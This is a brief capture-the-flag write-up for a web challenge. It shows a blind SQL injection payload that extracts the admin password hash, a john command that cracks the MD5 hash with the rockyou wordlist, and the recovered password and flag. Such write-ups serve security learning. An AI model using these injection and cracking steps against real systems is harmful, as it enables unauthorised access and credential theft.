![c127d8d8f0dffefd0353e093aa0e156b.png](96c01959297c425ebd36f0a5e1cba0be.png) Using our same blind sqli script from `0x01`, we can grab the password from the database ```` "username":f"admin' AND (substr((select password from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#", ```` Which gives us: `40ade195ed600eb731c86e084b6a42b3` which is an **md5** hash. Using john to crack it with the `rockyou` wordlist `john hash.txt wordlist=~/wordlists/password/rockyou.txt --format=Raw-MD5` `40ade195ed600eb731c86e084b6a42b3:whereismymind` Logging in with `admin:whereismymind` ![1ae29c7a8b62d66bb5bd93ca8bf883ce.png](3ec0a017275a471aa1e4b18db47de575.png) `flag{just_an_err0r_0f_thinking!}` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #web #sqli #blind Related: